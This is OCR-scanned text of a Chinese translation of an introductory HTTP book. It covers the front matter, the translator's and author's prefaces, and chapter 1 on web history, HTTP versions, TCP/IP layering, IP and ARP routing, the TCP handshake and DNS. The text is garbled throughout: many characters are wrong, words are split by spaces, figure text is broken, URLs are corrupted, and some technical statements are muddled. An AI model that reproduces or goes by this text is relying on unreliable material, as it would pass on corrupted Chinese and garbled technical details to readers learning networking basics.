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本 书 前 半 部 分 由 HTTP 的 成 长 发 展 史 媚 九 道 来 ， 基 于 HTTP 1.1 标准 讲解 通 
信 过 程 ， 包 括 HTTP 方 法 、 协 议 格式 、 报 文 结 构 、 首 部 字段 、 状 态 码 等 的 具体 合 
义 ， 还 分 别 讲解 也 TTP 通 信 过 程 中 代理 、 网 和 天、 隧道 等 的 作用 。 接 着 介绍 
SPDY、WebSocket、WebDAV 等 HTTP 的 扩展 功能 。 作 者 还 从 细 世 方面 出 
例 ， 让 读者 更 好 地 理解 何 为 无 状态 ( stateless ) 、 oui / / / 
哪 、 缓 存 机 制 ， 等 等 。 本 书后 半 部 分 的 重心 放 在 Web 安 全 上 ， 通 盖 HTTPS、 
SSL、 证 书 认 证 、 加 密 机 制 、Web 攻 击 手 段 等 内 容 。 
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内 容 提 要 

本 书 对 互联 网 基 盘 一 HTTP 协议 进 行 了 全 面 系统 的 介绍 。 作 者 由 HTTP 协 议 的 友 
展 历史 娓 娓 道 来 , 严谨 细致 地 放 析 了 HTTP 协 议 的 结构 , 列举 诸多 常见 通信 场景 及 实 成 
案例 , 最 后 延伸 到 Web 安全 、 最 新 技术 动向 等 方面 。 本 书 的 特色 为 在 讲解 的 同时 , 征 以 
大 量 生动 形象 的 通信 和 图例, 更 好 地 帮助 读者 深刻 理解 HTTP 通 信 过 程 中 客户 病 与 服务 
器 之 间 的 交互 情况 。 读者 可 通过 本 书 快速 了 解 并 掌握 HTTP 协 议 的 基础 , 前 端 工程 帅 分 
析 抓 包 数 据 , 后 端 工程 师 实现 REST API、 实现 自己 的 HTTP 服 务 器 等 过 程 中 所 需 的 
HTTP 相关 知识 点 本 书 均 有 介绍 。 

本 书 适合 Web 开发 工程 师 , 以 及 对 HTTP 协 议 感 兴趣 的 香 层 次 读者 。 
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译 者 序 


目前 ， 国 内 讲解 HTTP 协议 的 书 实在 太 少 了 。 

在 我 的 印象 中 ， 讲 解 网 络 协议 的 书 仅 有 两 本 。 一 本 是 《HTTP 权威 
指南 放 但 其 厚度 令 人 望 而 生 旦 ; 另 一 本 是 《TCP/PP 详解 ， 卷 1》， 内 容 
艰 汲 难 懂 ， 学 习 难 度 较 大 。 这 两 本 书 都 是 被 读者 们 奉 为 “圣经 ”的 经 典 
之 作 ， 大 师 们 的 授 道 自然 无 可 挑剔 ,但 关键 是 它们 对 初学 者 都 不 那么 友 
好 ， 大 家 的 学 习 信 心 很 容易 受到 打击 ， 阅 读 中 途 或 将 束之高阁 。 本 书 的 
出 现 及 时 缓解 了 该 问题 。 

HTTP 协议 本 号 并 不 复杂 ， 理 解 起 来 也 不 会 花费 太 多 学 习 成 本 , 但 
纯 概 念 式 的 学 习 稍 显 单调 。 前 端 工 程 师 也 许 对 各 种 具有 炫 酷 效果 的 页 面 
的 实现 技巧 、 蓉 心 习 目的 UI 框架 更 感 兴趣 ,但 因此 常常 忽视 了 HTTP 
协议 这 部 分 基础 内 容 。 实 际 上 ， 如 果 想 要 在 专业 技术 道路 上 走 得 更 坚 
实 ， 绝 对 不 能 绕 开学 习 HTTP 协议 这 一 环节 。 对 基础 及 核心 部 分 的 深入 
学 习 是 成 为 一 名 专业 技术 人 员 的 前 提 ， 以 不 变 应 万 变 才 是 立足 之 本 。 

我 在 学 习 Web 开发 的 过 程 中 ， 曾 接触 到 编写 网 络 候 虫 程序 、 分 析 
抓 包 数 据 、 实 现 HTTP 服务 器 、 提 供 网 站 REST API、 修 改 后 端 定制 杠 
架 等 方面 ， 它 们 无 一 例外 ， 都 会 用 到 HTTP 协议 的 各 方面 知识 ， 并 且 某 
些 细 市 无 法 通过 查阅 资料 立即 领会 到 ， 还 需 依靠 扎实 的 基础 及 平日 里 的 

本 书 作 者 的 写作 手法 平实 易 懂 ， 内 容 讲 解 透彻 到 位 。 前 半 部 分 由 
HTTP 的 成 长 发 展 史 妮 妮 道 来 ， 基 于 HTTP 1.1 标准 讲解 通信 过 程 ， 包 
括 HTTP 方法 、 协 议 格 式 、 报 文 结构 、 首 部 字段 、 状 态 码 等 的 具体 含 
义 ， 还 分 别 讲解 HTTP 通信 过 程 中 人 代理、 网关、 隧道 等 的 作用 。 接 着 介 
绍 SPDY、WebSocket、WebDAV 等 HTTP 的 扩展 功能 。 作 者 还 从 细节 
方面 举例 ， 让 读者 更 好 地 理解 何 为 无 状态 ( stateless )、301 和 302 重 定 
癌 的 区 别 在 哪 、 缓 存 机 制 ， 等 等 。 本 书后 半 部 分 的 重心 放 在 Web 安全 
上 ,涵盖 HTTPS、SSL、 证 书 认证 、 加 密 机 制 、Web 攻击 手段 等 内 容 。 


旨 在 让 读者 对 HTTP 协议 形成 一 个 整体 概念 ， 明 确 设计 HTTP 的 目的 及 
意义 所 在 ， 了 解 HTTP 的 工作 机 制 ， 掌 握 报 文中 稼 用 的 首部 字段 ， 返 回 
结果 状态 码 的 作用 ， 对 各 种 客户 端 与 服务 器 的 通信 交互 场景 的 细 症 等 都 
做 到 了 然 于 心 ， 从 而 在 平时 的 开发 工作 中 独立 思考 ， 迅 速 准确 地 定位 分 
析 由 HTTP 引发 的 问题 ， 并 辅 以 适当 的 方法 加 以 解决 。 

本 书 图 文 并 蕊 ， 大 量 图 片 穿插 文中 ， 生 动 形象 地 向 读者 介绍 每 一 个 
应 用 案例 ,减少 了 读者 阅读 时 的 枯燥 感 。 借 助 一 张 张 配 图 ， 读 者 们 不 仅 
会 加 深 视 觉 记忆 ， 在 轻松 愉悦 的 氛围 中 ， 还 可 以 更 深刻 地 理解 通信 机 制 
等 背后 的 工作 原理 。 正 所 谓 一 图 胜 千 文 。 

在 本 书 即 将 付 梓 之 际 ， 感 谢 EMC 首席 工程 师 高 博学 长 、IBM 工程 
师 李 亚 舟 (Fleuria)、 豆 状 运 维 工 程 师 钱 龙 、 全 栈 工程 师 缪 思源 
( Aveline Swan ) 以 及 姜 莹 等 好 友 。 他 们 在 繁重 的 工作 之 余 ， 御 牲 个 人 闲 
眼 时 间 ， 耐 心地 帮 我 扫 清 技术 疑点 ， 修 正 翻 译 玖 漏 ， 在 此 着 表示 囊 心 的 
感谢 。 

最 后 祝 大 家 阅读 愉快 ! 


于 均 良 
2014 年 1 月 
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本 书 的 上 一 版 是 2004 年 出 版 的 《今夜 力 办 避 HITP》 (中 文 译 名 : 
今 晚 我 们 一 起 学 习 HTTP， 翔 泳 社 )。 和 当时 一 样 ， 现 在 互联 网 的 主流 
仍 是 Web, 但 人 们 对 Web 的 要 求 却 不 断 地 发 生变 化 。Google 在 2005 年 
推出 了 地 图 服务 Google Maps， 很 多 人 看 到 这 一 Web 应 用 程序 的 界面 后 
感到 十 分 震惊 。 因 为 在 此 之 前 ,我 们 只 能 借助 时 面 应 用 程序 或 Flash 等 
方式 ， 实 现 流畅 滚动 及 视角 放大 缩小 等 功能 ， 如 今 这 些 功 能 仅 需 一 个 
Web 浏览 疾 就 能 呈现 了 。 也 许 正 是 由 于 Google Maps 的 出 现 ， 人 们 对 
Web 的 要 求 才 开始 变 得 多 了 起 来 。 发 送 请 求 、 等 待 啊 应 ， 这 些 HTTP 中 
稀 松 平常 的 功能 已 经 无 法 满足 人 们 的 需求 了 。 于 是 ，Web 不 再 停留 在 
HTTP/1.1 版 本 ， 在 保持 HTTP 简洁 的 同时 ， 也 开始 开发 新 的 功能 。 我 
之 所 以 要 撰写 《今夜 可 办 已 HTTP》 一 书 ， 是 因为 我 发 现 多 数 Web 应 用 
程序 开发 者 并 不 了 解 支 撑 Web 基础 的 HTTP 协议 。 我 坚信 通过 学 习 协 
议 ， 大 家 能 更 深刻 地 理解 Web 开发 。 即 使 是 在 本 书 撰写 完成 后 的 今天 ， 
我 的 这 一 想法 仍 未 改变 ， 表 定 还 有 很 多 开发 者 尚未 了 解 HTTP 协议 。 

对 HTTP 协议 有 了 更 深入 的 理解 后 ， 也 许 你 会 从 中 得 到 一 些 启 发 。 
不 再 关于 HTTP/1.1 版 本 的 制约 ， 你 也 能 开发 出 Google Maps 那样 的 应 
用 程序 。 

本 书 不 仅 面 向 Web 应 用 程序 的 开发 者 ， 还 面 回 使 用 Web 的 软件 开 
发 者 、Web 风险 评 佑 的 安全 工程 师 、 前 端 工程 师 以 及 Web 使 用 者 等 与 
Web 相关 的 所 有 读者 ， 希 望 这 本 书 能 对 大 家 有 所 帮助 。 


写 于 华盛顿 DC 的 酒店 
2013 年 1 月 吉日 
TRICORDER 株式 会 社 上 野 宣 
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第 1 章 
了 解 Web 及 网 络 基础 


本 章 概 述 了 Web 是 建立 在 何 种 技术 之 上 ， 以 及 HTTP 协 议 是 如 何 诞 
生 并 发 展 的 。 我 们 从 其 背景 着 手 ， 来 深入 了 解 这 部 分 内 容 。 








1.1 使 用 HTTP 协议 访问 Web 
你 知道 当 我 们 在 网 页 浏览 器 ( Web browser ) 的 地 址 栏 中 输入 URL 
时 ，Web 页 面 是 如 何 呈 现 的 吗 ” 


当 在 浏览 器 的 地 址 栏 内 输入 URL 时 , 可 以 看 到 Web 页 面 
当然 ,即使 你 不 了 解 其 运作 原理 , 也 能 看 到 Web 页 面 






在 浏览 器 地 址 栏 内 输入 URL 之 后 , 信息 会 被 送 往 某 处 


然后 从 某 处 获得 的 回复 ， 内 容 就 会 显示 在 Web 页 面 上 


~ | 
i f 
- 而 页 让 省 Ar 
上 | 
4 
: 





Web 页 面 当然 不 能 赁 空 显示 出 来 。 根 据 Web 浏览 器 地 址 栏 中 指定 
的 URL，Web 浏览 六 从 Web 服务 右 端 获取 文件 资源 ( resource ) 等 信 
息 ， 从 而 显示 出 Web 页 面 。 

像 这 种 通过 发 送 请 求 获取 服务 器 资源 的 Web 浏览 器 等 ， 都 可 称 为 
客户 端 ( client )。 


通过 指定 的 访问 地 址 获取 ( 或 上 传 ) 服 务 器 
资源 ( 文件 等 信息 ) 


a 


使 用 HTTP 协 议 的 通信 


Eee 
-一 一 一 一 -一 一 





Web 使 用 一 种 名 为 HTTP ( HyperText Transfer Protocol， 超 文本 传输 


第 1 章 了 解 Web 及 网 络 基 础 


协议 ) 的 协议 作为 规范 ， 完 成 从 客户 端 到 服务 器 端 等 一 系列 运作 流程 。 
而 协议 是 指 规则 的 约定 。 可 以 说 ，Web 是 建立 在 HTTP 协议 上 通信 的 。 


1.2 HTTP 的 诞生 


在 深入 学 习 HTTP 之 前 ， 我 们 先 来 介绍 一 下 HTTP 诞生 的 背景 。 了 
解 彰 景 的 同时 也 能 了 解 当 初 制定 HTTP 的 初衷 ， 这 样 有 助 于 我 们 更 好 地 
理解 。 


1.2.1 为 知识 共享 而 规划 Web 
1989 年 3 月 ,互联 网 还 只 属于 少数 人 。 在 这 一 互联 网 的 黎明 期 ， 





山 HTTP 通 常 被 译 为 超 文本 传输 协议 ,但 这 种 译 法 并 不 严谨 。 严 谨 的 译名 应 该 
为 “ 超 文本 转移 协议 ”。 但 是 前 一 译 法 已 约定 俗 成 ， 本 书 将 会 沿用 。 有 兴趣 

的 读者 可 参考 图 灵 社 区 的 相关 讨论 : http://www ituring.com.cn/article/1817。 
一 一 译 者 注 





Ra 


CERN (欧洲 核子 研究 组 织 ) 的 蒂 姆 . 伯 纳 斯 - 李 (Tim Berners- 
Lee ) 博士 提出 了 一 种 能 让 远 隐 两 地 的 研究 者 们 共 圣 知识 的 设想 。 

最 初 设想 的 基本 理念 是 ， 信 助 多 文档 之 间 相 互 关联 形成 的 超 文本 
( HyperText )， 连 成 可 相互 参阅 的 WWW ( World Wide Web, 万 维 网 )。 

现在 已 提出 了 3 项 WWW 构建 技术 ， 分 别 是 : 把 SGML ( Standard 
Generalized Markup Language， 标 准 通用 标记 语言 ) 作为 页 面 的 文本 标 
记 语 言 的 HTML ( HyperText Markup Language， 超 文本 标记 语言 ); 作 
为 文档 传递 协议 的 HTTP ; 指定 文档 所 在 地 址 的 URL ( Uniform Resource 
Locator， 统 一 资源 定位 符 )。 

WWW 这 一 名 称 ， 是 Web 浏览 锅 当 年 用 来 浏览 超 文本 的 客户 闫 应 
用 程序 时 的 名 称 。 现 在 则 用 来 表示 这 一 系列 的 集合 ， 也 可 简称 为 Web。 


1.2.2 Web 成 长 时 代 
1990 年 11 月 ，CERN 成 功 研 发 了 世界 上 第 一 台 Web 服务 器 和 Web 
浏览 器 。 两 年 后 的 1992 年 9 月 ， 日 本 第 一 个 网 站 的 主页 上 线 了 。 
e 日 本 第 一 个 主页 
http://www.ibarakiken.er.jp/www/ 
1990 年 ， 大 家 针对 HTML 1.0 草案 进行 了 讨论 ， 因 HTML 1.0 中 存 
在 多 处 模糊 不 清 的 部 分 ， 草 案 被 直接 废弃 了 。 
@ HHTML1.0 
http://www.w3.org/MarkUp/draft-ietf-iiir-html-01.txt 


1993 年 1 月， 现代 浏览 器 的 祖先 NCSA ( National Center for Supercomputer 
Applications， 美 国 国家 超级 计算 机 应 用 中 心 ) 研发 的 Mosaic 问世 了 。 
它 以 in-line ( 内 联 ) 等 形式 显示 HTML 的 图 像 ， 在 图 像 方面 出 色 的 表现 
使 它 迅 速 在 世界 范围 内 流行 开 来 。 

同年 秋天 ，Mosaic 的 Windows 版 和 Macintosh 版 面世 。 使 用 CGI 技 
术 的 NCSA Web 服务 器 、NCSA HTTPd 1.0 也 差不多 是 在 这 个 时 期 出 现 的 。 
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® NCSA Mosaic bounce page 


http://archive.ncsa.illinois.edu/mosaic.html 


se The NCSA HTTPd Home Page ( 存档 ) 
http://web.archive.org/web/20090426182129/http://hoohoo.ncsa. 
illinois.edu/( 原址 已 失效 ) 


1994 年 的 12 月， 网 景 通信 公司 发 布 了 了 Netscape Navigator 1.0， 
1995 年 微软 公司 发 布 mternet Explorer 1.0 和 2.0。 

紧 随 其 后 的 是 现在 已 然 成 为 Web 服务 器 标准 之 一 的 Apache， 当 时 
它 以 Apache 0.2 的 姿态 出 现在 世人 了 眼 前。 而 HTML 也 发 布 了 2.0 版 本 。 
那 一 年 ，Web 技术 的 发 展 突 飞 猛 进 。 

时 光 流 转 ， 从 1995 年 左右 起 ， 微 软 公 司 与 网 景 通信 公司 之 间 爆 发 
的 浏览 器 大 战 愈演愈烈 。 两 家 公司 都 各 上 自 对 HTML 做 了 扩展 ， 于 是 导 
致 在 写 HTML 页 面 时 ， 必 须 考 虑 兼容 他 们 两 家 公司 的 浏览 瘟 。 时 至 今 
日 ， 这 个 问题 仍 令 那 些 写 前 问 页 面 的 工程 师 感 到 球 手 。 

在 这 场 浏览 副 供 应 商 之 加 的 竞争 中 ,他们 不 仅 对 当时 发 展 中 的 各 种 
Web 标准 化 视而不见 ， 还 屡次 出 现 新 增 功 能 没有 对 应 说 明文 档 的 情况 。 

2000 年 前 后 ， 这 场 浏 览 带 战争 随 看 网 景 通信 公司 的 娶 洛 而 暂 告 一 
段落 。 但 就 在 2004 年 ，Mozilla 基金 会 发 布 了 Firefox 浏览 器 ,第 二 次 
浏览 器 大 战 随即 爆发 。 

Internet Explorer 浏览 带 的 版 本 从 6 升 到 7 前 后 花费 了 5 年 时 间 。 之 
后 接连 不 断 地 发 布 了 8、9、10 版 本 。 另 外 ，Chrome、Opera 、Safari 等 
浏览 闫 也 纷纷 抢 记 市 场 份额 。 


1.2.3 ”驻足 不 前 的 HTTP 


HTTP/0.9 
HTTP 于 1990 年 问世 。 那 时 的 HTTP 并 没有 作为 正式 的 标准 被 建立 。 
现在 的 HTTP 其 实 含有 HTTP1.0 之 前 版 本 的 意思 ， 因 此 被 称 为 HTTP/0.9。 
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HTTP/1.0 
HTTP 正式 作为 标准 被 公布 是 在 1996 年 的 5 月 ， 版 本 被 命名 为 
HTTP/1.0， 并 记载 于 RFC1945。 虽 说 是 初期 标准 ， 但 该 协议 标准 至 今 仍 
被 广泛 使 用 在 服务 器 端 。 
® RFC1945 - Hypertext Transfer Protocol -- HTTP/1.0 
http://www.letf.org/rfc/rfc1945.,txt 


HTTP/1.1 
1997 年 1 月 公布 的 HTTP/1.1 是 目前 主流 的 HTTP 协议 版 本 。 当 初 
的 标准 是 RFC2068， 之 后 发 布 的 修订 版 RFC2616 就 是 当前 的 最 新 版 本 。 
s RFC2616 - Hyperext Transfer Protocol -- HTTP/1.1 
http://www.ietf.org/rfc/rfc2616.txt 


可 见 ， 作 为 Web 文档 传输 协议 的 HITP， 它 的 版 本 几乎 没有 更 新 。 新 一 
代 HTTP/2.0 正在 制订 中 ,但 要 达到 较 高 的 使 用 覆盖 率 ， 仍 需 假 以 时 日 。 

当年 HTTP 协议 的 出 现 主要 是 为 了 解决 文本 传输 的 难题 。 由 于 协议 本 
身 非常 简单 ， 于 是 在 此 基础 上 设想 了 很 多 应 用 方法 并 投入 了 实际 使 用 。 现 
在 HTTP 协议 已 经 超出 了 Web 这 个 框架 的 局 限 ， 被 运用 到 了 各 种 场景 里 。 


1.3 ”网络 基础 TCP/IP 


为 了 理解 HTTP， 我 们 有 必要 事先 了 解 一 下 TCP/IP 协议 族 。 

通常 使 用 的 网 络 (包括 互联 网 ) 是 在 TCP/P 协议 族 的 基础 上 运作 
的 。 而 HTTP 属于 它 内 部 的 一 个 子 集 。 

接 下 来 ,我们 仅 介 绍 理解 HTTP 所 需 掌握 的 TCP/IP 协议 族 的 概要 。 若 
想 进一步 学 习 有 关 TCP/IP 的 知识 ， 请 参考 其 他 讲解 TCP/IP 的 专业 书籍 。 


1.3.1 TCP/IP 协议 族 
计算 机 与 网 络 设备 要 相互 通信 ， 双 方 就 必须 基于 相同 的 方法 。 比 


一 一 一 一 一 一 
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101， 如 何 探测 到 通信 目标 、 由 哪 一 边 先 发 起 通信 、 使 用 哪 种 语言 进行 通 
信 、 怎 样 结束 通信 等 规则 都 需要 事先 确定 。 不 同 的 硬件 、 操 作 系统 之 间 
的 通信 ， 所 有 的 这 一 切 都 需要 一 种 规则 。 而 我 们 就 把 这 种 规则 称 为 协议 


( protocol )。 





图 : TCP/IP 是 互联 网 相关 的 各 类 协议 族 的 总 称 


协议 中 存在 各 式 各 样 的 内 容 。 从 电缆 的 规格 到 IP 地 址 的 选 定 方法 、 
寻找 异地 用 户 的 方法 、 双 方 建立 通信 的 顺序 ， 以 及 Web 页 面 显示 需要 
处 理 的 步 又 ， 等 等 。 

像 这 样 把 与 互联 网 相关 联 的 协议 集合 起 来 总 称 为 TCP/IP。 也 有 说 
法 认为 ，TCP/IP 是 指 TCP 和 下 这 两 种 协议 。 还 有 一 种 说 法 认为 ，TCP/ 
IP 是 在 IP 协议 的 通信 过 程 中 ， 使 用 到 的 协议 族 的 统称 。 


1.3.2 TCP/IP 的 分 层 管理 

TCP/P 协议 族 里 重要 的 一 点 就 是 分 层 。TCP/P 协议 族 按 层次 分 别 
分 为 以 下 4 层 : 应 用 层 、 传 输 层 、 网 络 层 和 数据 链 路 层 。 

把 TCP/IP 层次 化 是 有 好 处 的 。 比 如 ， 如 果 互 联网 只 由 一 个 协议 统 
筹 ， 某 个 地 方 需要 改变 设计 时 ， 就 必须 把 所 有 部 分 整体 替换 掉 。 而 分 层 
之 后 只 需 把 变动 的 层 蔡 换 掉 即 可 。 把 各 层 之 间 的 接口 部 分 规划 好 之 后 ， 
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每 个 层次 内 部 的 设计 就 能 够 自由 改动 了 。 
值得 一 提 的 是 ， 层 次 化 之 后 ， 设 计 也 变 得 相对 简单 了 。 处 于 应 用 层 
上 的 应 用 可 以 只 考虑 分 派 给 自己 的 任务 ， 而 不 需要 弄 清 对 方 在 地 球 上 哪 
个 地 方 、 对 方 的 传输 路 线 是 怎样 的 、 是 否 能 确保 传输 送 达 等 问题 。 
TCP/P 协议 族 各 层 的 作用 如 下 。 


六 用 层 

应 用 层 决定 了 向 用 户 提 供应 用 服务 时 通信 的 活动 。 

TCP/IP 协议 族 内 预存 了 各 类 通用 的 应 用 服务 。 比 如 ，FTP (File 
Transfer Protocol， 文 件 传输 协议 ) 和 DNS ( Domain Name System ， 
域名 系统 ) 服务 就 是 其 中 两 类 。 

HTTP 协 以 也 处 于 该 层 。 


传输 层 

传输 层 对 上 层 应 用 层 ， 提 供 处 于 网 络 连接 中 的 两 台 计 算 机 之 间 的 
数据 传输 。 

在 传输 层 有 两 个 性 质 不 同 的 协议 : TCP ( Transmission Control 
Protocol， 传 输 控 制 协议 ) 和 UDP ( User Data Protocol， 用 户 数据 
报 协议 )。 


网 络 层 ( 又 名 网 络 互 连 层 ) 

网 络 层 用 来 处 理 在 网 络 上 流动 的 数据 包 。 数 据 包 是 网 络 传输 的 最 小 
数据 单位 。 该 层 规定 了 通过 怎样 的 路 径 ( 所谓 的 传输 路 线 ) 到 达 对 
方 计 算 机 ， 并 把 数据 包 传送 给 对 方 。 

与 对 方 计 算 机 之 间 通 过 多 台 计 算 机 或 网 络 设备 进行 传输 时 ， 了 网络 层 
所 起 的 作用 就 是 在 众多 的 选项 内 选择 一 条 传输 路 线 。 

链 路 层 ( 又 名 数据 链 路 层 ， 网 络 接 口 层 ) 

用 来 处 理 连接 网 络 的 硬件 部 分 。 包 括 控制 操作 系统 、 硬 件 的 设备 豫 
动 、NIC ( Network Interface Card， 网 络 适 配 更 ， 即 网 卡 )， 及 光纤 
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等 物理 可 见 部 分 (还 包括 连接 需 等 一 切 传输 媒介 )。 硬 件 上 的 范畴 
均 在 链 路 层 的 作用 范围 之 内 。 


1.3.3 TCP/IP 通信 传输 流 


客户 端 服务 器 


应 用 层 


传输 层 


网 络 层 


链 路 层 





利用 TCP/IP 协议 族 进 行 网 络 通信 时 ， 会 通过 分 层 顺 序 与 对 方 进行 
通信 。 发 送 端 从 应 用 层 往 下 走 ， 接 收 端 则 往 应 用 层 往 上 走 。 

我 们 用 HTTP 举例 来 说 明 ， 首 先 作 为 发 送 端的 客户 端 在 应 用 层 
( HTTP 协议 ) 发 出 一 个 想 看 某 个 Web 页 面 的 HTTP 请 求 。 

接着 ， 为 了 传输 方便 ， 在 传输 层 ( TCP 协议 ) 把 从 应 用 层 处 收 到 的 
数据 ( HTTP 请 求 报 文 ) 进行 分 割 ， 并 在 各 个 报 文 上 打上 标记 序号 及 端 
口号 后 转发 给 网 络 层 。 

在 网 络 层 ( IP 协议 )， 增 加 作为 通信 目的 地 的 MAC 地址 后 转发 给 
链 路 层 。 这 样 一 来 ， 发 往 网 络 的 通信 请 求 就 准备 齐全 了 。 

接收 端的 服务 器 在 链 路 层 接收 到 数据 ， 按 序 往 上 层 发 送 ， 一 直到 应 





oT. 加 


用 层 。 当 传输 到 应 用 层 ， 才 能 算 真 正 接收 到 由 客户 端 发 送 过 来 的 HTTP 





发 送 端 接收 端 
每 通过 一 层 则 每 通过 一 层 则 
增加 首部 删除 首部 
应 用 层 
传输 层 
网 络 层 
链 路 层 





发 送 病 在 层 与 层 之 间 传 输 数 据 时 ， 每 经 过 一 层 时 必定 会 被 打上 一 个 
该 层 所 属 的 站 部 信息 。 反 之 ， 接 收 端 在 层 与 层 传输 数据 时 ， 每 经 过 一 层 
时 会 把 对 应 的 首部 消去 。 

这 种 把 数据 信息 包装 起 来 的 做 法 称 为 封装 ( encapsulate )。 


1.4 与 HTTP 关系 密切 的 协议 : IP、TCP 和 DNS 


下 面 我 们 分 别针 对 在 TCP/P 协议 族 中 与 HTTP 密 不 可 分 的 3 个 协议 
(IP、TCP 和 DNS ) 进行 说 明 。 
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1.4.1 负责 传输 的 IP 协议 

按 层 次 分 ， 卫 (Internet Protocol ) 网 际 协议 位 于 网 络 层 。Internet 
Protocol 这 个 名 称 可 能 听 起 来 有 点 夸张 ， 但 事实 正 是 如 此 ， 因 为 几乎 所 
有 使 用 网 络 的 系统 都 会 用 到 IP 协议 。TCP/IP 协议 族 中 的 卫 指 的 就 是 网 
际 协议 ， 协 议 名 称 中 占据 了 一 半 位 置 ， 其 重要 性 可 见 一 斑 。 可 能 有 人 会 
把 “IP” 和 “IP 地 址 ” 搞 混 ,“IP” 其 实 是 一 种 协议 的 名 称 。 

PP 协议 的 作用 是 把 各 种 数据 包 传送 给 对 方 。 而 要 保证 确实 传送 到 对 
方 那里 ， 则 需要 满足 各 类 条 件 。 其 中 两 个 重要 的 条 件 是 IP 地 址 和 MAC 
地 址 ( Media Access Control Address )。 

IP 地 址 指明 了 节点 被 分 配 到 的 地 址 ，MAC 地 址 是 指 网 卡 所 属 的 固 
定 地 址 。IP 地 址 可 以 和 MAC 地 址 进行 配对 。 了 P 地 址 可 变换 , 但 MAC 
地 址 基本 上 不 会 更 改 。 


使 用 ARP 协议 凭借 MAC 地 址 进行 通信 

IP 间 的 通信 依赖 MAC 地 址 。 在 网 络 上 ， 通 信 的 双方 在 同一 局 域 网 
( LAN ) 内 的 情况 是 很 少 的 ， 通 常 是 经 过 多 台 计 算 机 和 网 络 设备 中 转 才 
能 连接 到 对 方 。 而 在 进行 中 转 时 ， 会 利用 下 一 站 中 转 设 备 的 MAC 地 址 
来 搜索 下 一 个 中 转 目 标 。 这 时 ， 会 采用 ARP 协议 ( Address Resolution 
Protocol )。ARP 是 一 种 用 以 解析 地 址 的 协议 ， 根 据 通信 方 的 卫 地址 就 
可 以 反 查 出 对 应 的 MAC 地 址 。 


没有 人 能 够 全 面 掌 握 互 联网 中 的 传输 状况 

在 到 达 通 信 目 标 前 的 中 转 过 程 中 ， 那 些 计 算 机 和 路 由 器 等 网 络 设备 
只 能 获悉 很 粗略 的 传输 路 线 。 

这 种 机 制 称 为 路 由 选择 ( routing )， 有 点 像 快 递 公 司 的 送 货 过 程 。 
想 要 寄 快 递 的 人 ， 只 要 将 目 己 的 货物 送 到 集散 中 心 ， 就 可 以 知道 快递 公 
司 是 否 肯 收 件 发 贷 ， 该 快递 公司 的 集散 中 心 检查 货物 的 送 达 地 址 ， 明 确 
下 站 该 送 往 哪个 区 域 的 集散 中 心 。 接 着 ， 那 个 区 域 的 集散 中 心 自 会 判断 


a 
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是 否 能 送 到 对 方 的 家 中 。 
我 们 是 想 通 过 这 个 比喻 说 明 ， 无 论 哪 台 计 算 机 、 哪 台 网 络 设备 ， 
们 都 无 法 全 面 掌 握 互 联网 中 的 细节 。 






四 入 IP 地 址 为 192.0.43.10 的 
地 方 发 送 教 据 晶 





(使 用 ARP 协议 解析 后 但 未 解析 > 
总 之 先 发 送 给 
O00-XX-C6-6B-XX-XX 吧 









MAC 地 址 
00-XX-C6-6B-XX-XX 





申 一 一 辕 ! 


下 一 站 星 00-XX-BS-As-XX-XX 1 








下 一 站 曲 00-XX-A6-6B-XX-XX 
就 是 目的 地 了 ! 












路 由 器 
MAC 地 址 
00-XX-B5-A5D-XX-XX 





IP 地 址 : 192.0.43.10 “本 
MAC 地 址 ，00-XX-A6-6B-XX-XX 接收 问 


1.4.2 ”确保 可 菲 性 的 TCP 协议 

按 层次 分 ，TCP 位 于 传输 层 ， 提 供 可 菲 的 字 书 流 服务 。 

所 谓 的 字 节 流 服务 ( Byte Stream Service ) 是 指 ， 为 了 方便 传输 ， 
将 大 块 数据 分 割 成 以 报 文 段 ( segment ) 为 单位 的 数据 包 进 行 管理 。 而 
可 靠 的 传输 服务 是 指 ， 能 够 把 数据 准确 可 靠 地 传 给 对 方 。 一 言 以 沿 之 ， 
TCP 协议 为 了 更 容易 传送 大 数据 才 把 数据 分 割 ， 而 且 TCP 协议 能 够 确 
认 数 据 最 终 是 否 送 达到 对 方 。 
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确保 数据 能 到 达 目 标 

为 了 准确 无 误 地 将 数据 送 达 目标 处 ，TCP 协议 采用 了 三 次 握手 
( three-way handshaking ) 策略 。 用 TCP 协议 把 数据 包 送 出 去 后 ，TCP 
不 会 对 传送 后 的 情况 置之不理 ， 它 一 定 会 回 对 方 确认 是 否 成 功 送 达 。 担 
手 过 程 中 使 用 了 TCP 的 标志 ( flag ) 一 一 SYN ( synchronize ) 和 ACK 
( acknowledgement ), 

发 送 问 首先 发 送 一 个 市 SYN 标志 的 数据 包 给 对 方 。 接 收 病 收 到 后 ， 
回 传 一 个 市 有 SYN/ACK 标志 的 数据 包 以 示 传 达 确 认 人 信息。 最 后 ,发送 
端 再 回 传 一 个 带 ACK 标志 的 数据 包 ， 人 代表“ 握手” 结束 。 

若 在 握手 过 程 中 某 个 阶段 英名 中 断 ，TCP 协议 会 再 次 以 相同 的 顺序 
发 送 相同 的 数据 包 。 


朗 据 是 发 给 你 了 










明白 我 收 到 你 发 给 我 的 
数据 时 了 1! (并 发 送 标 有 ， 
SYN/ACk 由 数据 包 





除了 上 述 三 次 握手 ，TCP 协议 还 有 其 他 各 种 手段 来 保证 通信 的 可 
靠 性 。 
1.5 ”负责 域名 解析 的 DNS 服务 


DNS ( Domain Name System ) 服务 是 和 HTTP 协议 一 样 位 于 应 用 层 
的 协议 。 它 提供 域名 到 IP 地 址 之 间 的 解析 服务 。 
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计算 机 既 可 以 被 赋予 IP 地 址 ， 也 可 以 被 赋予 主机 名 和 域名 。 比 如 
www.hackrjp。 

用 户 通 常 使 用 主机 名 或 域名 来 访问 对 方 的 计算 机 ， 而 不 是 直接 通过 
IP 地 址 访问 。 因 为 与 IP 地 址 的 一 组 纯 数字 相 比 ， 用 字母 配合 数字 的 表 
示 形 式 来 指定 计算 机 名 更 符合 人 类 的 记忆 习惯 。 

但 要 让 计算 机 去 理解 名 称 ， 相 对 而 言 就 变 得 困难 了 。 因 为 计算 机 更 
擅长 处 理 一 长 串 数字 。 

为 了 解决 上 述 的 问题 ，DNS 服务 应 运 而 生 。DNS 协议 提供 通过 域 
名 查找 IP 地 址 ， 或 道 向 从 IP 地 址 反 查 域名 的 服务 。 


014 





hackr.ip 对 应 曲 IP 地 址 
量 20X.189.105.112 






IP 地 址 
20X.189.105.112 


向 20X.189.105.112 发 送 访问 请 求 





hackr.jp 的 
Web 服务 器 


1.6 ”各 种 协议 与 HTTP 协议 的 关系 

